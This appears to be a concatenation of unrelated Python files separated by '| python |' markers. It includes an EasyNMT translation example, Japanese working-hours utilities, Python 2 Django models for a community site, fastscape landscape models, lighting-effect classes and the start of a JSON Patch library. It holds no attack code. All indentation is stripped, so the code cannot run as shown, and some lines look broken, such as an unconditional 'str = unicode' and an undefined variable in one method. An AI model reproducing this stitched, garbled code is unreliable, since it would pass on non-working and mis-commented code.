request.user = SimpleLazyObject(lambda: get_user(request))
| python |
"""
Module to run something
"""
def hello_world(message='Hello World'):
"""
Print demo message to stdout
"""
print(message)
| python |
"""
This example shows how EasyNMT can be used for sentence translation
"""
import datetime
from easynmt import EasyNMT
sentences = [
# '薄雾',
# 'Voici un exemple d\'utilisation d\'EasyNMT.', # 'This is an example how to use EasyNMT.',
'南瓜人?',
# 'Cada frase es luego traducida al idioma de destino seleccionado.',
# 'Each sentences is then translated to your chosen target language.',
# 'On our website, you can find various translation models.',
# 'New York City (NYC), often called simply New York, is the most populous city in the United States.',
# 'PyTorch is an open source machine learning library based on the Torch library, used for applications such as computer vision and natural language processing, primarily developed by Facebook\'s AI Research lab (FAIR).',
# 'A deep neural network (DNN) is an artificial neural network (ANN) with multiple layers between the input and output layers.'
]
target_lang = 'en' # We want to translate the sentences to German (de)
source_lang = 'zh' # We want to translate the sentences to German (de)
# model = EasyNMT('opus-mt')
model = EasyNMT('m2m_100_418M')
# model = EasyNMT('m2m_100_1.2B')
print(datetime.datetime.now())
translations = model.translate(sentences, target_lang=target_lang, source_lang=source_lang, batch_size=8, beam_size=3)
print(translations)
print(datetime.datetime.now())
| python |
from . import argument_magics as _args
from . import data_magics as _data
from .list_magic import L as _LType
from .seq_magic import N as _NType
# Argument magics
X_i = _args.X_i()
F = _args.F()
# Sequence type
N = _NType()
# Data magics
L = _LType()
D = _data.D()
S = _data.S()
B = _data.B()
T = _data.T()
| python |
"""
実績作業時間に関するutil関数を定義しています。
"""
from __future__ import annotations
import datetime
from collections import defaultdict
from typing import Any, Dict, Optional, Tuple
from annoworkapi.utils import datetime_to_str, str_to_datetime
_ActualWorkingHoursDict = Dict[Tuple[datetime.date, str, str], float]
"""実績作業時間の日ごとの情報を格納する辞書
key: (date, workspace_member_id, job_id), value: 実績作業時間
"""
def get_term_start_end_from_date_for_actual_working_time(
start_date: Optional[str], end_date: Optional[str], tzinfo: Optional[datetime.tzinfo] = None
) -> tuple[Optional[str], Optional[str]]:
"""開始日と終了日から、実績作業時間を取得するAPIに渡すクエリパラメタterm_startとterm_endを返します。
Args:
start_date: 開始日
end_date: 終了日
tzinfo: 指定した日付のタイムゾーン。Noneの場合は、システムのタイムゾーンとみなします。
Notes:
WebAPIの絞り込み条件が正しくない恐れがあります。
Returns:
実績作業時間を取得するAPIに渡すterm_startとterm_end
"""
if tzinfo is None:
# システムのタイムゾーンを利用する
tzinfo = datetime.datetime.now().astimezone().tzinfo
term_start: Optional[str] = None
if start_date is not None:
dt_local_start_date = datetime.datetime.fromisoformat(start_date).replace(tzinfo=tzinfo)
term_start = datetime_to_str(dt_local_start_date)
term_end: Optional[str] = None
if end_date is not None:
dt_local_end_date = datetime.datetime.fromisoformat(end_date).replace(tzinfo=tzinfo)
# end_date="2021-01-02"なら term_endは "2021-01-01T23:59:59.999"になるようにする
# WARNING: WebAPIの都合。将来的に変わる恐れがある
tmp = dt_local_end_date + datetime.timedelta(days=1) - datetime.timedelta(microseconds=1000)
term_end = datetime_to_str(tmp)
return term_start, term_end
def _create_actual_working_hours_dict(actual: dict[str, Any], tzinfo: datetime.tzinfo) -> _ActualWorkingHoursDict:
results_dict: _ActualWorkingHoursDict = {}
dt_local_start_datetime = str_to_datetime(actual["start_datetime"]).astimezone(tzinfo)
dt_local_end_datetime = str_to_datetime(actual["end_datetime"]).astimezone(tzinfo)
workspace_member_id = actual["workspace_member_id"]
job_id = actual["job_id"]
if dt_local_start_datetime.date() == dt_local_end_datetime.date():
actual_working_hours = (dt_local_end_datetime - dt_local_start_datetime).total_seconds() / 3600
results_dict[(dt_local_start_datetime.date(), workspace_member_id, job_id)] = actual_working_hours
else:
dt_tmp_local_start_datetime = dt_local_start_datetime
# 実績作業時間が24時間を超えることはないが、24時間を超えても計算できるような処理にする
while dt_tmp_local_start_datetime.date() < dt_local_end_datetime.date():
dt_next_date = dt_tmp_local_start_datetime.date() + datetime.timedelta(days=1)
dt_tmp_local_end_datetime = datetime.datetime(
year=dt_next_date.year, month=dt_next_date.month, day=dt_next_date.day, tzinfo=tzinfo
)
actual_working_hours = (dt_tmp_local_end_datetime - dt_tmp_local_start_datetime).total_seconds() / 3600
results_dict[(dt_tmp_local_start_datetime.date(), workspace_member_id, job_id)] = actual_working_hours
dt_tmp_local_start_datetime = dt_tmp_local_end_datetime
actual_working_hours = (dt_local_end_datetime - dt_tmp_local_start_datetime).total_seconds() / 3600
results_dict[(dt_local_end_datetime.date(), workspace_member_id, job_id)] = actual_working_hours
return results_dict
def create_actual_working_times_daily(
actual_working_times: list[dict[str, Any]], tzinfo: Optional[datetime.tzinfo] = None
) -> list[dict[str, Any]]:
"""`getActualWorkingTimes` APIなどで取得した実績時間のlistから、日付、ジョブ、メンバ単位で集計した実績時間を生成します。
Args:
actual_working_times: `getActualWorkingTimes` APIなどで取得した実績時間のlist
tzinfo: 日付を決めるためのタイムゾーン。未指定の場合はシステムのタイムゾーンを参照します。
Returns:
日付、ジョブ、メンバ単位で集計した実績時間のlistを返します。listの要素はdictで以下のキーを持ちます。
* date
* job_id
* workspace_member_id
* actual_working_hours
"""
results_dict: _ActualWorkingHoursDict = defaultdict(float)
tmp_tzinfo = tzinfo if tzinfo is not None else datetime.datetime.now().astimezone().tzinfo
assert tmp_tzinfo is not None
for actual in actual_working_times:
tmp_results = _create_actual_working_hours_dict(actual, tzinfo=tmp_tzinfo)
for key, value in tmp_results.items():
results_dict[key] += value
results_list: list[dict[str, Any]] = []
for (date, workspace_member_id, job_id), actual_working_hours in results_dict.items():
# 実績作業時間が0の情報は不要なので、結果情報に格納しない
if actual_working_hours > 0:
results_list.append(
dict(
date=str(date),
workspace_member_id=workspace_member_id,
job_id=job_id,
actual_working_hours=actual_working_hours,
)
)
return results_list
| python |
from __future__ import unicode_literals
from django_markdown.models import MarkdownField
from django.db import models
from django.contrib.auth.models import User
from taggit.managers import TaggableManager
from taggit.models import TaggedItemBase
from os.path import join as isfile
from django.conf import settings
import os
#this will store the extra profile details of the user
class UserProfileModel(models.Model):
user = models.OneToOneField(User)
user_description = MarkdownField()
skills = TaggableManager()
user_type_select = models.CharField(max_length = 50,default = 'None')
programme = models.CharField(max_length = 15)
branch = models.CharField(max_length = 100)
college_year = models.CharField(max_length = 10)
graduation_year = models.CharField(max_length = 4)
user_profile_pic = models.FileField(upload_to = 'profile_pics/',blank = True,default = 'profile_pics/avatars/default.png')
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.user.username
class CodehubTopicModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
topic_heading = models.CharField(max_length = 100)
topic_detail = MarkdownField()
topic_link = models.CharField(max_length = 100,blank = True)
tags = TaggableManager()
topic_type = models.CharField(max_length = 10)
file = models.FileField(upload_to = 'uploads/',blank = True)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.topic_heading
def delete(self,*args,**kwargs):
print 'in the delete function of codehub model'
if self.file:
file_path = os.path.join(settings.MEDIA_ROOT,self.file.name)
print file_path
if os.path.isfile(file_path):
os.remove(file_path)
super(CodehubTopicModel,self).delete(*args,**kwargs)
class CodehubTopicCommentModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
topic = models.ForeignKey('CodehubTopicModel')
comment_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.topic.topic_heading
class CodehubCreateEventModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
event_heading = models.CharField(max_length = 100)
event_date = models.DateTimeField(null = True,blank = True)
event_venue = models.CharField(max_length = 100)
event_description = MarkdownField()
event_for = models.CharField(max_length = 25)#basic or advanced
tags = TaggableManager()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.event_heading
class CodehubEventQuestionModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
event = models.ForeignKey(CodehubCreateEventModel)
question_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class MusicModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
music_name = models.CharField(max_length = 100)
music_file = models.FileField(upload_to = 'music/')
music_lang = models.CharField(max_length = 20)
music_artist = models.CharField(max_length = 30)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.music_name
class CodehubQuestionModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
question_heading = models.CharField(max_length = 200)
question_description = MarkdownField()
question_link = models.CharField(max_length = 100,blank = True)
question_tags = TaggableManager()
question_type = models.CharField(max_length = 20)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.question_heading
class CodehubQuestionCommentModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
question = models.ForeignKey(CodehubQuestionModel)
comment_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.question.question_heading
class BlogPostModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
title = models.CharField(max_length = 200)
body = MarkdownField()
tags = TaggableManager()
image_file = models.FileField(upload_to = 'blog_images/',blank = True)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
views_count = models.CharField(max_length = 15, default = 0)
def __str__(self):
return self.title
def delete(self,*args,**kwargs):
print 'In the delete function of the BlogPostModel'
if self.image_file:
file_path = os.path.join(settings.MEDIA_ROOT,self.image_file.name)
if os.path.isfile(file_path):
os.remove(file_path)
super(BlogPostModel,self).delete(*args,**kwargs)
class BlogPostCommentModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
blog_post = models.ForeignKey(BlogPostModel)
comment_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.comment_text
class CodehubInnovationPostModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
title = models.CharField(max_length = 200)
description = MarkdownField()
tags = TaggableManager()
vote = models.CharField(max_length = 100,default = 0)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.title
class CodehubInnovationCommentModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
innovation_post = models.ForeignKey(CodehubInnovationPostModel)
comment_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.comment_text
class DevhubQuestionModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
question_heading = models.CharField(max_length = 200)
question_description = MarkdownField()
question_link = models.CharField(max_length = 100,blank = True)
question_tags = TaggableManager()
question_type = models.CharField(max_length = 20)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.question_heading
class DevhubQuestionAnswerModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
question = models.ForeignKey(DevhubQuestionModel)
answer_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class DevhubTopicModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
topic_heading = models.CharField(max_length = 100)
topic_detail = MarkdownField()
topic_link = models.CharField(max_length = 100,blank = True)
tags = TaggableManager()
file = models.FileField(upload_to = 'devhub/',blank = True)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.topic_heading
def delete(self,*args,**kwargs):
print 'in the delete function of devhub model'
if self.file:
file_path = os.path.join(settings.MEDIA_ROOT,self.file.name)
print file_path
if os.path.isfile(file_path):
os.remove(file_path)
super(DevhubTopicModel,self).delete(*args,**kwargs)
class DevhubTopicCommentModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
topic = models.ForeignKey(DevhubTopicModel)
comment_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.topic.topic_heading
class DevhubProjectModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
project_heading = models.CharField(max_length = 200)
project_description = MarkdownField()
project_link = models.CharField(max_length = 100,blank = True)
tags = TaggableManager()
class FollowUserModel(models.Model):
# following_user = models.CharField(max_length = 10) #user who is following
following_user = models.ForeignKey(User,related_name = 'following_user')
followed_user = models.ForeignKey(User,related_name = 'followed_user') #user being followed
following_user_profile = models.ForeignKey(UserProfileModel,related_name = 'following_user_profile')
followed_user_profile = models.ForeignKey(UserProfileModel,related_name = 'followed_user_profile')
class ProposeEventModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
event_heading = models.CharField(max_length = 200)
event_description = MarkdownField()
tags = TaggableManager()
event_type = models.CharField(max_length = 30)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class ProposeEventVoteModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
event = models.ForeignKey(ProposeEventModel)
vote = models.CharField(max_length = 10)
class ProposeEventSuggestionModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
event = models.ForeignKey(ProposeEventModel)
sugg_text = models.CharField(max_length = 500)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
#host_project section starts here
class HostProjectModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
project_name = models.CharField(max_length = 200)
project_description = MarkdownField()
skills = TaggableManager()
project_status = models.CharField(max_length = 15,default = 'active')
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class PingHostProjectModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
hosted_project = models.ForeignKey(HostProjectModel)
ping_status = models.CharField(max_length = 20,default = 'waiting')
created = models.DateTimeField(auto_now_add = True)
class HostProjectQuestionModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
project = models.ForeignKey(HostProjectModel)
question_text = models.CharField(max_length = 500)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class MesssageModel(models.Model):
sender = models.ForeignKey(User,related_name = 'sender')
receiver = models.ForeignKey(User,related_name = 'receiver')
sender_profile = models.ForeignKey(UserProfileModel,related_name = 'sender_profile')
receiver_profile = models.ForeignKey(UserProfileModel,related_name = 'receiver_profile')
message_text = models.CharField(max_length = 500)
message_status = models.CharField(max_length = 5,default = 'False')
created = models.DateTimeField(auto_now_add = True)
#the info section comes here
class TaggedInfoAddQuery(TaggedItemBase):
content_object = models.ForeignKey('TheInfoAddQueryModel')
class TheInfoAddQueryModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
queryText = models.CharField(max_length = 200)
queryTags = TaggableManager(through = TaggedInfoAddQuery)
created = models.DateTimeField(auto_now_add = True)
class TheInfoQueryAnswerModel(models.Model):
info_query = models.ForeignKey(TheInfoAddQueryModel)
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
answer_text = models.CharField(max_length = 200)
class TheInfoQueryAnswerVoteModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
answer = models.ForeignKey(TheInfoQueryAnswerModel)
class GeneralQuestionModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
ques_text = MarkdownField()
ques_tags = TaggableManager()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class GeneralQuestionAnswerModel(models.Model):
question = models.ForeignKey(GeneralQuestionModel)
answer_text = MarkdownField()
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class CreateUserGroupModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
group_name = models.CharField(max_length = 50)
group_description = MarkdownField()
group_tags = TaggableManager()
group_status = models.CharField(max_length = 15,default = 'active') #other option is deactive
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
#create track of the user request to join a particular group
class GroupUsersInterestTrackModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
group = models.ForeignKey(CreateUserGroupModel)
request_status = models.CharField(max_length = 15)
created = models.DateTimeField(auto_now_add = True)
class GroupUserCommentModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
group = models.ForeignKey(CreateUserGroupModel)
comment_text = models.CharField(max_length = 150,blank = False)
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class DevhubCreateEventModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
event_heading = models.CharField(max_length = 100)
event_date = models.DateTimeField(null = True,blank = True)
event_venue = models.CharField(max_length = 100)
event_description = MarkdownField()
event_for = models.CharField(max_length = 25)#basic or advanced
tags = TaggableManager()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
def __str__(self):
return self.event_heading
class DevhubEventQuestionModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
event = models.ForeignKey(CodehubCreateEventModel)
question_text = MarkdownField()
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
"""
models for storing the user diff accounts
"""
class UserSocialAccountModel(models.Model):
user = models.ForeignKey(User)
user_profile = models.ForeignKey(UserProfileModel)
social_profile_name = models.CharField(max_length = 50)
social_profile_link = models.CharField(max_length = 100)
| python |
import xsimlab as xs
from ..processes.boundary import BorderBoundary
from ..processes.channel import (StreamPowerChannel,
DifferentialStreamPowerChannelTD)
from ..processes.context import FastscapelibContext
from ..processes.flow import DrainageArea, SingleFlowRouter, MultipleFlowRouter
from ..processes.erosion import TotalErosion
from ..processes.grid import RasterGrid2D
from ..processes.hillslope import LinearDiffusion, DifferentialLinearDiffusion
from ..processes.initial import (BareRockSurface,
Escarpment,
FlatSurface,
NoErosionHistory)
from ..processes.main import (Bedrock,
StratigraphicHorizons,
SurfaceTopography,
SurfaceToErode,
TerrainDerivatives,
TotalVerticalMotion,
UniformSedimentLayer)
from ..processes.marine import MarineSedimentTransport, Sea
from ..processes.tectonics import (BlockUplift,
SurfaceAfterTectonics,
TectonicForcing,
TwoBlocksUplift)
# ``bootstrap_model`` has the minimal set of processes required to
# simulate on a 2D uniform grid the evolution of topographic surface
# under the action of tectonic and erosion processes. None of such
# processes are included. It only provides the "skeleton" of a
# landscape evolution model and might be used as a basis to create
# custom models.
bootstrap_model = xs.Model({
'grid': RasterGrid2D,
'fs_context': FastscapelibContext,
'boundary': BorderBoundary,
'tectonics': TectonicForcing,
'surf2erode': SurfaceToErode,
'erosion': TotalErosion,
'vmotion': TotalVerticalMotion,
'topography': SurfaceTopography,
})
# ``basic_model`` is a "standard" landscape evolution model that
# includes block uplift, (bedrock) channel erosion using the stream
# power law and hillslope erosion/deposition using linear
# diffusion. Initial topography is a flat surface with random
# perturbations. Flow is routed on the topographic surface using a D8,
# single flow direction algorithm. All erosion processes are computed
# on a topographic surface that is first updated by tectonic forcing
# processes.
basic_model = bootstrap_model.update_processes({
'uplift': BlockUplift,
'surf2erode': SurfaceAfterTectonics,
'flow': SingleFlowRouter,
'drainage': DrainageArea,
'spl': StreamPowerChannel,
'diffusion': LinearDiffusion,
'terrain': TerrainDerivatives,
'init_topography': FlatSurface,
'init_erosion': NoErosionHistory
})
# ``sediment_model`` is built on top of ``basic_model`` ; it tracks
# the evolution of both the topographic surface and the bedrock,
# separated by a uniform, active layer of sediment. This model uses an
# extended version of the stream-power law that also includes channel
# transport and deposition. Flow is routed using a multiple flow
# direction algorithm. Differential erosion/deposition is enabled for
# both hillslope and channel processes, i.e., distinct values may be
# set for the erosion and transport coefficients (bedrock vs
# soil/sediment).
sediment_model = basic_model.update_processes({
'bedrock': Bedrock,
'active_layer': UniformSedimentLayer,
'init_bedrock': BareRockSurface,
'flow': MultipleFlowRouter,
'spl': DifferentialStreamPowerChannelTD,
'diffusion': DifferentialLinearDiffusion
})
# ``marine_model`` simulates the erosion, transport and deposition of
# bedrock or sediment in both continental and submarine
# environments. It is built on top of ``sediment_model`` to which it
# adds a process for sediment transport, deposition and compaction in
# the submarine domain (under sea level). The processes for the
# initial topography and uplift both allow easy set-up of the two land
# vs. marine environments. An additional process keeps track of a
# fixed number of stratigraphic horizons over time.
marine_model = sediment_model.update_processes({
'init_topography': Escarpment,
'uplift': TwoBlocksUplift,
'sea': Sea,
'marine': MarineSedimentTransport,
'strati': StratigraphicHorizons
})
| python |
"""
Effects classes
added to show because they track themselves over time
have one or more targets that they can apply the effect to in unison
change some attribute over time - generally using envelopes
"""
import random
from birdfish.envelope import (Envelope, EnvelopeSegment,
ColorEnvelope)
from birdfish.lights import BaseLightElement, LightElement
from birdfish import tween
# TODO There should probably be a base element - then BaseData or BaseLight
# element
class BaseEffect(BaseLightElement):
def __init__(self, *args, **kwargs):
super(BaseEffect, self).__init__(*args, **kwargs)
self.targets = kwargs.get('targets', [])
# TODO shoud triggered default be T or F?
triggered = kwargs.get('triggered', True)
if triggered:
self.trigger_state = 0
else:
self.trigger_state = 1
self.envelope_filters = []
def filter_targets(self, targets):
"""
subclasses can override to provide some behavior that limits
the effect only to some targets, or targets in some state
"""
# TODO may need to rething to make it easier to add filters
# and or reuse this adsr stuff
if targets and self.envelope_filters:
filtered_targets = []
for target in targets:
if hasattr(target, 'adsr_envelope'):
label = target.adsr_envelope.get_current_segment().label
if label in self.envelope_filters:
filtered_targets.append(target)
return filtered_targets
else:
return targets
def get_targets(self, targets):
if not targets:
targets = self.targets
elif isinstance(targets, LightElement):
targets = [targets]
# set self.targets for use by _off_trigger or other
# methods outside the update call
self.targets = self.filter_targets(targets)
return self.targets
def trigger(self, intensity, **kwargs):
if intensity:
self.trigger_state = 1
self._on_trigger(intensity, **kwargs)
else:
self.trigger_state = 0
self._off_trigger(intensity, **kwargs)
def _off_trigger(self, intensity, **kwargs):
# Since effects can act on lights during release - after off-trigger
# they may be responsible for turning element intensity off
super(BaseEffect, self)._off_trigger()
for element in self.targets:
element.set_intensity(0)
def update(self, show, targets=None):
raise NotImplementedError
class EnvelopeMap(BaseEffect, Envelope):
def __init__(self, attr, *args, **kwargs):
BaseEffect.__init__(self, *args, **kwargs)
Envelope.__init__(self, *args, **kwargs)
self.attr = attr
def _off_trigger(self, intensity, **kwargs):
self.reset()
def update(self, show, targets=None):
if self.trigger_state:
targets = self.get_targets(targets)
if self.last_update != show.timecode:
val = Envelope.update(self, show.time_delta)
self.last_update = show.timecode
for target in targets:
setattr(target, self.attr, val)
class ColorShift(BaseEffect, ColorEnvelope):
# TODO notes:
# how does it handle the existing color of an element
# can I handle explicit start color, or take current color and shift both
# can we reset the color to the original?
#
def __init__(self, shift_amount=0, target=0, **kwargs):
super(ColorShift, self).__init__(**kwargs)
ColorEnvelope.__init__(self, **kwargs)
self.hue = 0
self.saturation = 0
self.intensity = 1
def _on_trigger(self, intensity, **kwargs):
self.reset()
def update(self, show, targets=None):
if self.trigger_state:
targets = self.get_targets(targets)
# TODO need to make this anti duplicate calling logic
# more effects generic - maybe effects specific stuff goes
# in a render method
if self.last_update != show.timecode:
self.hue, self.saturation, self.intensity = self._color_update(
show.time_delta)
self.last_update = show.timecode
for target in targets:
if self.hue is not None:
target.hue = self.hue
if self.saturation is not None:
target.saturation = self.saturation
if self.intensity is not None:
target.set_intensity(self.intensity)
class Twinkle(BaseEffect):
def __init__(self, frequency=2, **kwargs):
super(Twinkle, self).__init__(**kwargs)
self.on_min = .01
self.on_max = 1
self.off_min = .8
self.off_max = 1.3
self.intensity_min = .3
self.intensity_max = 1
self.blinkon = True
self.cycle_elapsed = 0
self.last_changed = None
# self.mode = 'darken'
self.mode = 'modes-disabled'
self.use_trigger = kwargs.get('use_trigger', True)
# the parameters of current cycle
self.on_dur = self.off_dur = self.intensity = 0
self.durations = {True: self.on_dur, False: self.off_dur}
def setup_cycle(self):
self.on_dur = self.on_min + random.random() * (self.on_max
- self.on_min)
self.off_dur = self.off_min + random.random() * (self.off_max
- self.off_min)
self.intensity = self.intensity_min + random.random() * (
self.intensity_max - self.intensity_min)
self.durations = {True: self.on_dur, False: self.off_dur}
def update(self, show, targets=None):
# note, currently can not easily assign a twinkle to an elements
# effects array - must add it to the show directly as it uses the
# trigger method this is true of any effect that uses trigger method of
# elements for rendering the effect - basically an effect can not be
# piggy-backed on an elements trigger, if it is to use trigger to
# cause/manage the effect perhaps an effect should always manipulate
# the lower level attributes instead of using a trigger
# self.trigger_state = 1
if self.trigger_state:
targets = self.get_targets(targets)
self.cycle_elapsed += show.time_delta
if self.cycle_elapsed > self.durations[self.blinkon]:
# current cycle complete
if self.blinkon:
# trigger off targets
if self.use_trigger:
[t.trigger(0) for t in targets]
else:
[t.set_intensity(0) for t in targets]
self.setup_cycle()
else:
for t in targets:
if self.mode == 'darken':
value = min(t.intensity, self.intensity)
elif self.mode == 'lighten':
value = max(t.intensity, self.intensity)
else:
# modes currently disabled
value = self.intensity
if self.use_trigger:
t.trigger(value)
else:
t.set_intensity(value)
self.blinkon = not self.blinkon
self.cycle_elapsed = 0
def _off_trigger(self):
# only works for explicit effect targets
if self.use_trigger:
[t.trigger(0) for t in self.targets]
else:
[t.set_intensity(0) for t in targets]
self.trigger_state = 1
class Blink(BaseEffect):
def __init__(self, frequency=2, **kwargs):
super(Blink, self).__init__(**kwargs)
self._frequency = frequency
self.blinkon = True
self.last_changed = None
self._set_frequency(self._frequency)
def update(self, show, targets=None):
targets = self.get_targets(targets)
if not self.last_changed:
self.last_changed = show.timecode
return
if show.timecode - self.last_changed > self.period_duration:
self.blinkon = not self.blinkon
self.last_changed = show.timecode
if not self.blinkon:
# we only modify intensity when off
for target in targets:
target.set_intensity(0)
def _get_frequency(self):
return self._frequency
def _set_frequency(self, frequency):
self._frequency = frequency
self.period_duration = 1.0 / (2 * self._frequency)
frequency = property(_get_frequency, _set_frequency)
class Pulser(BaseEffect):
# TODO need to implement trigger here - otherwise effects will run
# "in the background" all the time,and may not be synced to
# elements as desired.
#
def __init__(self, frequency=1, on_shape=tween.LINEAR,
off_shape=tween.LINEAR, **kwargs):
super(Pulser, self).__init__(**kwargs)
period_duration = 1.0 / (2 * frequency)
on_flash = EnvelopeSegment(start=0, change=1, tween=on_shape,
duration=period_duration)
off_flash = EnvelopeSegment(start=1, change=-1, tween=off_shape,
duration=period_duration)
self.envelope = Envelope(loop=-1)
self.envelope.segments = [on_flash, off_flash]
def update(self, show, targets=None):
if self.trigger_state:
targets = self.get_targets(targets)
val = self.envelope.update(show.time_delta)
for target in targets:
target.set_intensity(val * target.intensity)
| python |
# -*- coding: utf-8 -*-
#
# python-json-patch - An implementation of the JSON Patch format
# https://github.com/stefankoegl/python-json-patch
#
# Copyright (c) 2011 Stefan Kögl <[email protected]>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
""" Apply JSON-Patches (RFC 6902) """
from __future__ import unicode_literals
import collections
import copy
import functools
import json
import sys
from jsonpointer import JsonPointer, JsonPointerException
_ST_ADD = 0
_ST_REMOVE = 1
try:
from collections.abc import MutableMapping, MutableSequence
except ImportError:
from collections import MutableMapping, MutableSequence
str = unicode
# Will be parsed by setup.py to determine package metadata
__author__ = 'Stefan Kögl <[email protected]>'
__version__ = '1.24'
__website__ = 'https://github.com/stefankoegl/python-json-patch'
__license__ = 'Modified BSD License'
# pylint: disable=E0611,W0404
if sys.version_info >= (3, 0):
basestring = (bytes, str) # pylint: disable=C0103,W0622
class JsonPatchException(Exception):
"""Base Json Patch exception"""
class InvalidJsonPatch(JsonPatchException):
""" Raised if an invalid JSON Patch is created """
